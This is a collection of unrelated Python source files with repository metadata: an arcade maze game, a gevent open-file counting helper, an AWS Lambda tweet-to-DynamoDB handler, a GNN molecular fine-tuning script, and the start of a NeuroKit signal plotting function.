wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom =3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 0.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 7.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 8 * SPRITE_SIZE
room.wall_list.append(wall)
room.background = arcade.load_texture("g.png")
bigpotion = arcade.Sprite("small.png",0.05)
bigpotion.center_x = 800
bigpotion.center_y = 100
room.bigpotion_list.append(bigpotion)
return room
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self, width, height):
"""
Initializer
"""
super().__init__(width, height,"Tocate el pnnywise")
# Set the working directory (where we expect to find files) to the same
# directory this .py file is in. You can leave this out of your own
# code, but it is needed to easily run the examples using "python -m"
# as mentioned at the top of this program.
file_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(file_path)
# Sprite lists
self.current_room = 0
# Set up the player
self.game_over = False
self.door_list = None
self.rooms = None
self.score = 0
self.coin_list = None
self.player_sprite = None
self.physics_engine = None
self.smallpotion_list = None
self.bigpotion_list = None
def setup(self):
""" Set up the game and initialize the variables. """
# Set up the player
self.player_sprite = arcade.AnimatedWalkingSprite()
self.score = 0
self.coin_list = arcade.SpriteList()
self.smallpotion_list = arcade.SpriteList()
self.bigpotion_list = arcade.SpriteList()
self.player_sprite.center_x = 100
self.player_sprite.center_y = 150
character_scale = 0.75
self.player_sprite.stand_right_textures = []
self.player_sprite.stand_right_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale))
self.player_sprite.stand_left_textures = []
self.player_sprite.stand_left_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_right_textures = []
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale))
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale))
self.player_sprite.walk_left_textures = []
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale, mirrored=True))
# Our list of rooms
self.rooms = []
# Create the rooms. Extend the pattern for each room.
room = setup_room_1()
self.rooms.append(room)
room = setup_room_2()
self.rooms.append(room)
# Our starting room number
self.current_room = 0
# Create a physics engine for this room
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].wall_list)
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].door_list)
def on_draw(self):
"""
Render the screen.
"""
# This command has to happen before we start drawing
arcade.start_render()
# Draw the background texture
arcade.draw_texture_rectangle(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2,
SCREEN_WIDTH, SCREEN_HEIGHT, self.rooms[self.current_room].background)
# Draw all the walls in this room
self.rooms[self.current_room].door_list.draw()
self.rooms[self.current_room].wall_list.draw()
self.rooms[self.current_room].coin_list.draw()
self.rooms[self.current_room].bigpotion_list.draw()
self.rooms[self.current_room].smallpotion_list.draw()
# If you have coins or monsters, then copy and modify the line
# above for each list.
output = "Score: {}".format(self.score)
arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
self.player_sprite.draw()
def on_key_press(self, key, modifiers):
"""Called whenever a key is pressed. """
if key == arcade.key.W:
self.player_sprite.change_y = MOVEMENT_SPEED
elif key == arcade.key.S:
self.player_sprite.change_y = -MOVEMENT_SPEED
elif key == arcade.key.A:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif key == arcade.key.D:
self.player_sprite.change_x = MOVEMENT_SPEED
def on_key_release(self, key, modifiers):
"""Called when the user releases a key. """
if key == arcade.key.W or key == arcade.key.S:
self.player_sprite.change_y = 0
elif key == arcade.key.A or key == arcade.key.D:
self.player_sprite.change_x = 0
def update(self, delta_time):
""" Movement and game logic """
self.player_sprite.update_animation()
# Call update on all sprites (The sprites don't do much in this
# example though.)
self.physics_engine.update()
# Do some logic here to figure out what room we are in, and if we need to go
# to a different room.
if self.player_sprite.center_x > SCREEN_WIDTH and self.current_room == 0:
self.current_room = 1
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = 0
elif self.player_sprite.center_x < 0 and self.current_room == 1:
self.current_room = 0
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = SCREEN_WIDTH
hit_list = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].coin_list)
hit_list2 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].bigpotion_list)
hit_list3 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].smallpotion_list)
for coin in hit_list:
coin.kill()
self.score += 1
my_sound = arcade.load_sound("coinsound.wav")
arcade.play_sound(my_sound)
if self.score == 4:
for i in self.rooms[self.current_room].door_list:
i.kill()
your_sound = arcade.load_sound("door.wav")
arcade.play_sound(your_sound)
for smallpotion in hit_list3:
smallpotion.kill()
self.player_sprite.scale=0.5
tu_sound = arcade.load_sound("shrink.wav")
arcade.play_sound(tu_sound)
for bigpotion in hit_list2:
bigpotion.kill()
self.player_sprite.scale=1
yo_sound = arcade.load_sound("grow.wav")
arcade.play_sound(yo_sound)
def main():
""" Main method """
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
window.setup()
arcade.run()
if __name__ == "__main__":
main()
| 36.324219
| 124
| 0.614367
| 2,439
| 18,598
| 4.481755
| 0.113161
| 0.090568
| 0.051596
| 0.075016
| 0.710457
| 0.682737
| 0.658311
| 0.613942
| 0.605709
| 0.586955
| 0
| 0.016981
| 0.29073
| 18,598
| 512
| 125
| 36.324219
| 0.81169
| 0.105495
| 0
| 0.604046
| 0
| 0
| 0.049861
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028902
| false
| 0
| 0.00578
| 0
| 0.046243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe916e74f3d8c5dd73c18e07f1aa14f15ee3d8d0
| 4,869
|
py
|
Python
|
venv/lib/python3.6/site-packages/gevent/testing/openfiles.py
|
Guillaume-Fernandez/phishfinder
|
b459a30202fd5dfb1340b43c70363705de7cedd9
|
[
"MIT"
] | 10
|
2021-03-23T03:46:19.000Z
|
2022-03-08T07:20:25.000Z
|
venv/lib/python3.6/site-packages/gevent/testing/openfiles.py
|
Guillaume-Fernandez/phishfinder
|
b459a30202fd5dfb1340b43c70363705de7cedd9
|
[
"MIT"
] | 7
|
2021-05-21T16:51:48.000Z
|
2022-03-12T00:50:26.000Z
|
venv/lib/python3.6/site-packages/gevent/testing/openfiles.py
|
Guillaume-Fernandez/phishfinder
|
b459a30202fd5dfb1340b43c70363705de7cedd9
|
[
"MIT"
] | 4
|
2021-04-21T00:49:34.000Z
|
2021-11-21T09:18:29.000Z
|
# Copyright (c) 2018 gevent community
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import os
import unittest
import re
from . import sysinfo
# Linux/OS X/BSD platforms can implement this by calling out to lsof
if sysinfo.WIN:
def _run_lsof():
raise unittest.SkipTest("lsof not expected on Windows")
else:
def _run_lsof():
import tempfile
pid = os.getpid()
fd, tmpname = tempfile.mkstemp('get_open_files')
os.close(fd)
lsof_command = 'lsof -p %s > %s' % (pid, tmpname)
if os.system(lsof_command):
# XXX: This prints to the console an annoying message: 'lsof is not recognized'
raise unittest.SkipTest("lsof failed")
with open(tmpname) as fobj:
data = fobj.read().strip()
os.remove(tmpname)
return data
def default_get_open_files(pipes=False):
data = _run_lsof()
results = {}
for line in data.split('\n'):
line = line.strip()
if not line or line.startswith("COMMAND"):
# Skip header and blank lines
continue
split = re.split(r'\s+', line)
_command, _pid, _user, fd = split[:4]
# Pipes (on OS X, at least) get an fd like "3" while normal files get an fd like "1u"
if fd[:-1].isdigit() or fd.isdigit():
if not pipes and fd[-1].isdigit():
continue
fd = int(fd[:-1]) if not fd[-1].isdigit() else int(fd)
if fd in results:
params = (fd, line, split, results.get(fd), data)
raise AssertionError('error when parsing lsof output: duplicate fd=%r\nline=%r\nsplit=%r\nprevious=%r\ndata:\n%s' % params)
results[fd] = line
if not results:
raise AssertionError('failed to parse lsof:\n%s' % (data, ))
results['data'] = data
return results
def default_get_number_open_files():
if os.path.exists('/proc/'):
# Linux only
fd_directory = '/proc/%d/fd' % os.getpid()
return len(os.listdir(fd_directory))
try:
return len(get_open_files(pipes=True)) - 1
except (OSError, AssertionError, unittest.SkipTest):
return 0
lsof_get_open_files = default_get_open_files
try:
# psutil import subprocess which on Python 3 imports selectors.
# This can expose issues with monkey-patching.
import psutil
except ImportError:
get_open_files = default_get_open_files
get_number_open_files = default_get_number_open_files
else:
# If psutil is available (it is cross-platform) use that.
# It is *much* faster than shelling out to lsof each time
# (Running 14 tests takes 3.964s with lsof and 0.046 with psutil)
# However, it still doesn't completely solve the issue on Windows: fds are reported
# as -1 there, so we can't fully check those.
def get_open_files():
"""
Return a list of popenfile and pconn objects.
Note that other than `fd`, they have different attributes.
.. important:: If you want to find open sockets, on Windows
and linux, it is important that the socket at least be listening
(socket.listen(1)). Unlike the lsof implementation, this will only
return sockets in a state like that.
"""
results = dict()
process = psutil.Process()
results['data'] = process.open_files() + process.connections('all')
for x in results['data']:
results[x.fd] = x
results['data'] += ['From psutil', process]
return results
def get_number_open_files():
process = psutil.Process()
try:
return process.num_fds()
except AttributeError:
# num_fds is unix only. Is num_handles close enough on Windows?
return 0
| 38.642857
| 139
| 0.657835
| 683
| 4,869
| 4.606149
| 0.401171
| 0.03719
| 0.030515
| 0.022886
| 0.035601
| 0.019708
| 0.019708
| 0
| 0
| 0
| 0
| 0.007448
| 0.255494
| 4,869
| 125
| 140
| 38.952
| 0.860414
| 0.439721
| 0
| 0.211268
| 0
| 0.014085
| 0.09191
| 0.01823
| 0
| 0
| 0
| 0
| 0.042254
| 1
| 0.084507
| false
| 0
| 0.112676
| 0
| 0.309859
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe97b6953c22bb335b56638721adf4a720e34f5f
| 2,922
|
py
|
Python
|
FAUCovidCrawler/AWSLambda/lambda_function.py
|
Awannaphasch2016/CDKFAUCovid19Cralwer
|
a84d90612314cb4d4618da95238617a524b1b280
|
[
"MIT"
] | null | null | null |
FAUCovidCrawler/AWSLambda/lambda_function.py
|
Awannaphasch2016/CDKFAUCovid19Cralwer
|
a84d90612314cb4d4618da95238617a524b1b280
|
[
"MIT"
] | null | null | null |
FAUCovidCrawler/AWSLambda/lambda_function.py
|
Awannaphasch2016/CDKFAUCovid19Cralwer
|
a84d90612314cb4d4618da95238617a524b1b280
|
[
"MIT"
] | null | null | null |
'''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
import boto3
import json
import twitter_to_es
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \
# twitter_to_es
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
headers = {"Content-Type": "application/json"}
s3 = boto3.client('s3')
kinesis_client = boto3.client('kinesis')
# dynamoDb_client = boto3.client('dynamodb')
# Lambda execution starts here
def handler(event, context):
for record in event['Records']:
# Get the bucket name and key for the new file
bucket = record['s3']['bucket']['name']
key = record['s3']['object']['key']
# Get s3 object, read, and split the file into lines
try:
obj = s3.get_object(Bucket=bucket, Key=key)
except Exception as e:
print(e)
print(
'Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(
key, bucket))
raise e
# Parse s3 object content (JSON)
try:
# https://stackoverflow.com/questions/31976273/open-s3-object-as-a-string-with-boto3
s3_file_content = obj['Body'].read().decode('utf-8')
# clean trailing comma
if s3_file_content.endswith(',\n'):
s3_file_content = s3_file_content[:-2]
tweets_str = '[' + s3_file_content + ']'
# print(tweets_str)
tweets = json.loads(tweets_str)
except Exception as e:
print(e)
print('Error loading json from object {} in bucket {}'.format(key,
bucket))
raise e
for doc in tweets:
tweet = get_tweet(doc)
# print(tweet['sentiments'])
print(tweet)
print('===\n\n\n')
#=====================
#==send data to dynamoDB
#=====================
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Instantiate a table resource object without actually
# creating a DynamoDB table. Note that the attributes of this table
# are lazy-loaded: a request is not made nor are the attribute
# values populated until the attributes
# on the table resource are accessed or its load() method is called.
table = dynamodb.Table('faucovidstream_twitter_with_sentiment')
# Print out some data about the table.
# This will cause a request to be made to DynamoDB and its attribute
# values will be set based on the response.
print(table.creation_date_time)
dynamodb.put_item(
Item=tweet
)
| 33.204545
| 142
| 0.589322
| 352
| 2,922
| 4.798295
| 0.454545
| 0.017762
| 0.038484
| 0.02013
| 0.089994
| 0.040261
| 0.040261
| 0.040261
| 0
| 0
| 0
| 0.014728
| 0.302875
| 2,922
| 87
| 143
| 33.586207
| 0.814433
| 0.380561
| 0
| 0.195122
| 0
| 0.02439
| 0.166854
| 0.020787
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.097561
| 0
| 0.121951
| 0.170732
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9913a9a0d00104117bbc4e7f42cf9196b11854
| 8,791
|
py
|
Python
|
finetune/finetune.py
|
zaixizhang/MGSSL
|
fdb7e78bb927d735ed64dc78fb792adb13352e1c
|
[
"Apache-2.0"
] | 43
|
2021-10-15T01:11:36.000Z
|
2022-03-31T02:05:41.000Z
|
finetune/finetune.py
|
zaixizhang/MGSSL
|
fdb7e78bb927d735ed64dc78fb792adb13352e1c
|
[
"Apache-2.0"
] | 5
|
2021-12-09T08:07:22.000Z
|
2022-03-02T07:34:34.000Z
|
finetune/finetune.py
|
zaixizhang/MGSSL
|
fdb7e78bb927d735ed64dc78fb792adb13352e1c
|
[
"Apache-2.0"
] | 7
|
2021-11-23T01:15:36.000Z
|
2022-03-07T16:30:30.000Z
|
import argparse
from loader import MoleculeDataset
from torch_geometric.data import DataLoader
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
import numpy as np
from model import GNN, GNN_graphpred
from sklearn.metrics import roc_auc_score
from splitters import scaffold_split, random_split
import pandas as pd
import os
import shutil
from tensorboardX import SummaryWriter
criterion = nn.BCEWithLogitsLoss(reduction = "none")
def train(args, model, device, loader, optimizer):
model.train()
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y = batch.y.view(pred.shape).to(torch.float64)
#Whether y is non-null or not.
is_valid = y**2 > 0
#Loss matrix
loss_mat = criterion(pred.double(), (y+1)/2)
#loss matrix after removing null target
loss_mat = torch.where(is_valid, loss_mat, torch.zeros(loss_mat.shape).to(loss_mat.device).to(loss_mat.dtype))
optimizer.zero_grad()
loss = torch.sum(loss_mat)/torch.sum(is_valid)
loss.backward()
optimizer.step()
def eval(args, model, device, loader):
model.eval()
y_true = []
y_scores = []
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
with torch.no_grad():
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y_true.append(batch.y.view(pred.shape))
y_scores.append(pred)
y_true = torch.cat(y_true, dim = 0).cpu().numpy()
y_scores = torch.cat(y_scores, dim = 0).cpu().numpy()
roc_list = []
for i in range(y_true.shape[1]):
#AUC is only defined when there is at least one positive data.
if np.sum(y_true[:,i] == 1) > 0 and np.sum(y_true[:,i] == -1) > 0:
is_valid = y_true[:,i]**2 > 0
roc_list.append(roc_auc_score((y_true[is_valid,i] + 1)/2, y_scores[is_valid,i]))
if len(roc_list) < y_true.shape[1]:
print("Some target is missing!")
print("Missing ratio: %f" %(1 - float(len(roc_list))/y_true.shape[1]))
return sum(roc_list)/len(roc_list) #y_true.shape[1]
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch implementation of pre-training of graph neural networks')
parser.add_argument('--device', type=int, default=0,
help='which gpu to use if any (default: 0)')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--epochs', type=int, default=100,
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=0.001,
help='learning rate (default: 0.001)')
parser.add_argument('--lr_scale', type=float, default=1,
help='relative learning rate for the feature extraction layer (default: 1)')
parser.add_argument('--decay', type=float, default=0,
help='weight decay (default: 0)')
parser.add_argument('--num_layer', type=int, default=5,
help='number of GNN message passing layers (default: 5).')
parser.add_argument('--emb_dim', type=int, default=300,
help='embedding dimensions (default: 300)')
parser.add_argument('--dropout_ratio', type=float, default=0.5,
help='dropout ratio (default: 0.5)')
parser.add_argument('--graph_pooling', type=str, default="mean",
help='graph level pooling (sum, mean, max, set2set, attention)')
parser.add_argument('--JK', type=str, default="last",
help='how the node features across layers are combined. last, sum, max or concat')
parser.add_argument('--gnn_type', type=str, default="gin")
parser.add_argument('--dataset', type=str, default = 'sider', help='root directory of dataset. For now, only classification.')
parser.add_argument('--input_model_file', type=str, default = '../motif_based_pretrain/saved_model/motif_pretrain.pth', help='filename to read the model (if there is any)')
parser.add_argument('--filename', type=str, default = '', help='output filename')
parser.add_argument('--seed', type=int, default=42, help = "Seed for splitting the dataset.")
parser.add_argument('--runseed', type=int, default=0, help = "Seed for minibatch selection, random initialization.")
parser.add_argument('--split', type = str, default="scaffold", help = "random or scaffold or random_scaffold")
parser.add_argument('--eval_train', type=int, default = 1, help='evaluating training or not')
parser.add_argument('--num_workers', type=int, default = 4, help='number of workers for dataset loading')
args = parser.parse_args()
torch.manual_seed(args.runseed)
np.random.seed(args.runseed)
device = torch.device("cuda:" + str(args.device)) if torch.cuda.is_available() else torch.device("cpu")
if torch.cuda.is_available():
torch.cuda.manual_seed_all(args.runseed)
#Bunch of classification tasks
if args.dataset == "tox21":
num_tasks = 12
elif args.dataset == "hiv":
num_tasks = 1
elif args.dataset == "pcba":
num_tasks = 128
elif args.dataset == "muv":
num_tasks = 17
elif args.dataset == "bace":
num_tasks = 1
elif args.dataset == "bbbp":
num_tasks = 1
elif args.dataset == "toxcast":
num_tasks = 617
elif args.dataset == "sider":
num_tasks = 27
elif args.dataset == "clintox":
num_tasks = 2
else:
raise ValueError("Invalid dataset name.")
#set up dataset
dataset = MoleculeDataset("dataset/" + args.dataset, dataset=args.dataset)
print(dataset)
if args.split == "scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1)
print("scaffold")
elif args.split == "random":
train_dataset, valid_dataset, test_dataset = random_split(dataset, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random")
elif args.split == "random_scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = random_scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random scaffold")
else:
raise ValueError("Invalid split option.")
print(train_dataset[0])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers = args.num_workers)
val_loader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
#set up model
model = GNN_graphpred(args.num_layer, args.emb_dim, num_tasks, JK = args.JK, drop_ratio = args.dropout_ratio, graph_pooling = args.graph_pooling, gnn_type = args.gnn_type)
if not args.input_model_file == "":
model.from_pretrained(args.input_model_file)
model.to(device)
#set up optimizer
#different learning rate for different part of GNN
model_param_group = []
model_param_group.append({"params": model.gnn.parameters()})
if args.graph_pooling == "attention":
model_param_group.append({"params": model.pool.parameters(), "lr":args.lr*args.lr_scale})
model_param_group.append({"params": model.graph_pred_linear.parameters(), "lr":args.lr*args.lr_scale})
optimizer = optim.Adam(model_param_group, lr=args.lr, weight_decay=args.decay)
print(optimizer)
for epoch in range(1, args.epochs+1):
print("====epoch " + str(epoch))
train(args, model, device, train_loader, optimizer)
print("====Evaluation")
if args.eval_train:
train_acc = eval(args, model, device, train_loader)
else:
print("omit the training accuracy computation")
train_acc = 0
val_acc = eval(args, model, device, val_loader)
test_acc = eval(args, model, device, test_loader)
print("train: %f val: %f test: %f" %(train_acc, val_acc, test_acc))
if __name__ == "__main__":
main()
| 42.674757
| 176
| 0.657604
| 1,214
| 8,791
| 4.594728
| 0.21911
| 0.03227
| 0.060954
| 0.013625
| 0.280925
| 0.219433
| 0.189315
| 0.148082
| 0.148082
| 0.148082
| 0
| 0.015582
| 0.21158
| 8,791
| 205
| 177
| 42.882927
| 0.789208
| 0.033216
| 0
| 0.090909
| 0
| 0
| 0.179783
| 0.01131
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019481
| false
| 0.006494
| 0.103896
| 0
| 0.12987
| 0.077922
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe99a748e2fcbf259f6611afd0ca5930032c99b6
| 5,703
|
py
|
Python
|
neurokit2/signal/signal_plot.py
|
gutierrezps/NeuroKit
|
a30f76e64b4108abdc652a20391dc0288c62501d
|
[
"MIT"
] | 1
|
2022-03-20T21:09:34.000Z
|
2022-03-20T21:09:34.000Z
|
neurokit2/signal/signal_plot.py
|
Lei-I-Zhang/NeuroKit
|
a30f76e64b4108abdc652a20391dc0288c62501d
|
[
"MIT"
] | null | null | null |
neurokit2/signal/signal_plot.py
|
Lei-I-Zhang/NeuroKit
|
a30f76e64b4108abdc652a20391dc0288c62501d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from ..events import events_plot
from ..stats import standardize as nk_standardize
def signal_plot(
signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs
):
"""Plot signal with events as vertical lines.
Parameters
----------
signal : array or DataFrame
Signal array (can be a dataframe with many signals).
sampling_rate : int
The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if
the data should be plotted over time in seconds. Otherwise the data is plotted over samples.
Defaults to None.
subplots : bool
If True, each signal is plotted in a subplot.
standardize : bool
If True, all signals will have the same scale (useful for visualisation).
labels : str or list
Defaults to None.
**kwargs : optional
Arguments passed to matplotlib plotting.
Examples
----------
>>> import numpy as np
>>> import pandas as pd
>>> import neurokit2 as nk
>>>
>>> signal = nk.signal_simulate(duration=10, sampling_rate=1000)
>>> nk.signal_plot(signal, sampling_rate=1000, color="red")
>>>
>>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)),
... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)),
... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))})
>>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True)
>>> nk.signal_plot([signal, data], standardize=True)
"""
# Sanitize format
if isinstance(signal, list):
try:
for i in signal:
len(i)
except TypeError:
signal = np.array(signal)
if isinstance(signal, pd.DataFrame) is False:
# If list is passed
if isinstance(signal, list) or len(np.array(signal).shape) > 1:
out = pd.DataFrame()
for i, content in enumerate(signal):
if isinstance(content, (pd.DataFrame, pd.Series)):
out = pd.concat([out, content], axis=1, sort=True)
else:
out = pd.concat(
[out, pd.DataFrame({"Signal" + str(i + 1): content})],
axis=1,
sort=True,
)
signal = out
# If vector is passed
else:
signal = pd.DataFrame({"Signal": signal})
# Copy signal
signal = signal.copy()
# Guess continuous and events columns
continuous_columns = list(signal.columns.values)
